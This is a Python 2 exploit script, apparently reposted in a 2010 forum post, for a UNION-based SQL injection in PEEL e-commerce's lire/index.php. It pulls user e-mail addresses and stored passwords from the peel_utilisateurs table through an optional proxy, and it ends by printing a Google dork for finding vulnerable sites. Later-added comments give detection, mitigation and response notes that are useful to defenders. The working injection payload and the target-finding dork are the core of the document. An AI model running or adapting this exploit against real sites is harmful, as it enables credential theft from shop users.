#!/usr/bin/python
# Forum post by hozarares, January 4, 2010. The listing was collapsed onto
# two lines on the page; the line breaks below are restored, the statements
# themselves are unchanged.
#
# This was written for educational purpose only. Use it at your own risk.
# Author will be not responsible for any damage!
################################################################
# #
## Vuln discovered by banjirian
#
#
# Summary (Python 2 script, banner dated 06/2009):
#   Proof-of-concept for a UNION-based SQL injection through the `rubid`
#   query parameter of lire/index.php in PEEL e-commerce. It sends one GET
#   request whose injected SELECT reads the `email` and `mot_passe` columns
#   of the `peel_utilisateurs` table, and decides success by looking for the
#   marker string "baltazar" (the hex literal 0x62616c74617a6172) in the
#   response body.
#
# Defender notes:
#   - Detection: in web-server or WAF logs, look for requests to
#     lire/index.php whose `rubid` value contains `union`, `select`,
#     `concat_ws`, the table name `peel_utilisateurs`, or the hex marker
#     above. The script sends urllib2's default User-Agent unless a proxy
#     rewrites it.
#   - Mitigation: `rubid` is presumably a numeric id (the payload starts
#     with `rubid=1`); the server side should validate it as an integer and
#     bind it as a query parameter instead of concatenating it into SQL.
#     The fixed PEEL release is not stated on this page; check the vendor.
#   - Response: if such requests were answered successfully, treat the
#     e-mail addresses and stored password values in `peel_utilisateurs` as
#     disclosed and rotate the affected credentials.
import os, sys, time, re, urllib2, httplib, socket

# Pick the terminal clear command for the platform and run it (fixed string,
# no user input reaches os.system).
if sys.platform == 'linux' or sys.platform == 'linux2':
    clearing = 'clear'
else:
    clearing = 'cls'
os.system(clearing)

proxy = "None"   # the literal string "None" is used as the "no proxy" sentinel
count = 0        # index of the argv element currently being examined

# Wrong number of arguments: print the banner/usage and stop.
if len(sys.argv) < 2 or len(sys.argv) > 4:
    print "\n|---------------------------------------------------------------|"
    print "| b4ltazar[@]gmail[dot]com |"
    print "| 06/2009 PEEL e-commerce |"
    print "| Vuln discovered by banjirian |"
    print "| Usage: peel.py http://www.site.com/ |"
    print "| Visit Ljuska v2 :: Forums - Index page |"
    print "|---------------------------------------------------------------|\n"
    sys.exit(1)

# Scan argv: `-h` prints help and exits, `-p` takes the following argument
# as the proxy (host:port form, judging by how it is used below).
for arg in sys.argv:
    if arg == '-h':
        print "\n|-------------------------------------------------------------------------------|"
        print "| b4ltazar[@]gmail[dot]com |"
        print "| 06/2009 PEEL e-commerce |"
        print "| Vuln discovered by banjirian |"
        print "| Usage: peel.py www.site.com |"
        print "| Example: pell.py ACKSOFT |"
        print "| Visit Ljuska v2 :: Forums - Index page |"
        print "|-------------------------------------------------------------------------------|\n"
        sys.exit(1)
    elif arg == '-p':
        proxy = sys.argv[count+1]
    count += 1

# Normalise the site argument to "http://.../" form.
site = sys.argv[1]
if site[:4] != "http":
    site = "http://"+site
if site[-1] != "/":
    site = site + "/"

print "\n|---------------------------------------------------------------|"
print "| b4ltazar[@]gmail[dot]com |"
print "| 06/2009 PEEL e-commerce |"
print "| Vuln discovered by banjirian |"
print "| Visit Ljuska v2 :: Forums - Index page |"
print "|---------------------------------------------------------------|\n"
print "\n[-] %s" % time.strftime("%X")

# 20-second default timeout for every socket opened below.
socket.setdefaulttimeout(20)

# Proxy handling: when a proxy was given, open a TCP connection to it and
# fetch a page through it as a liveness check; otherwise build a
# ProxyHandler with no explicit mapping.
try:
    if proxy != "None":
        print "[+] Proxy:",proxy
        print "\n[+] Testing Proxy..."
        pr = httplib.HTTPConnection(proxy)
        pr.connect()
        proxy_handler = urllib2.ProxyHandler({'http': 'http://'+proxy+'/'})
        proxyfier = urllib2.build_opener(proxy_handler)
        proxyfier.open("http://www.google.com")
        print
        print "\t[!] w00t!,w00t! Proxy: "+proxy+" Working"
        print
    else:
        print "[-] Proxy not given"
        print
        proxy_handler = urllib2.ProxyHandler()
except(socket.timeout):
    print
    print "\t[-] Proxy Timed Out"
    print
    sys.exit(1)
# NOTE(review): `except ()` names an empty tuple of exception types, so this
# handler matches nothing; any error other than socket.timeout propagates.
except(),msg:
    print msg
    print "\t[-] Proxy Failed"
    print
    sys.exit(1)

# Third-party page used to display the caller's apparent IP address.
# NOTE(review): assigning a string literal cannot raise IndexError, so the
# except branch is unreachable as written.
try:
    url = "http://antionline.com/tools-and-toys/ip-locate/index.php?address="
except(IndexError):
    print "[-] Wtf?"

# Fetch the lookup page through the opener and print the line that contains
# "<br><br>" with its bold/line-break tags stripped.
proxyfier = urllib2.build_opener(proxy_handler)
proxy_check = proxyfier.open(url).readlines()
for line in proxy_check:
    if re.search("<br><br>", line):
        line = line.replace("</b>","").replace('<br>',"").replace('<b>',"")
        print "\n[!]",line,"\n"

# NOTE(review): the collapsed paste does not show whether the next statement
# was indented under the loop above; it is placed at top level here - confirm
# against an original copy.
print "[+] Target:",site
print "[+] Exploiting...\n"

# Single request carrying the injected UNION SELECT in `rubid`. The third
# concat_ws() argument is the hex-encoded marker "baltazar"; finding it in
# the response is taken as proof that the injected query's output was
# reflected into the page. The URL printed on success is the same query
# without the marker column.
try:
    check = proxyfier.open(site+'lire/index.php?rubid=1+union+all+select+1,concat_ws(char(58),email,mot_passe,0x62616c74617a6172),3+from+peel_utilisateurs--').read()
    if re.findall("baltazar", check):
        print "[!] w00t!,w00t!: ",site+'lire/index.php?rubid=1+union+all+select+1,concat_ws(char(58),email,mot_passe),3+from+peel_utilisateurs--'
        print
    else:
        print "[-] Can't exploit :("
        print
# HTTP error responses (e.g. 4xx/5xx from the target) are ignored silently.
except(urllib2.HTTPError):
    pass
except(KeyboardInterrupt, SystemExit):
    pass

# NOTE(review): as above, the paste leaves the indentation of the next
# statement ambiguous (it may have belonged to the except block); placed at
# top level here - confirm against an original copy.
print "[!] Use this google dork for finding targets"
print "\tinurl:lire/index.php?rubid=\n"
print "\n[-] %s" % time.strftime("%X")
####################################################
# Poster's remark (translated from Romanian): "Older, but it still works
# very well ......"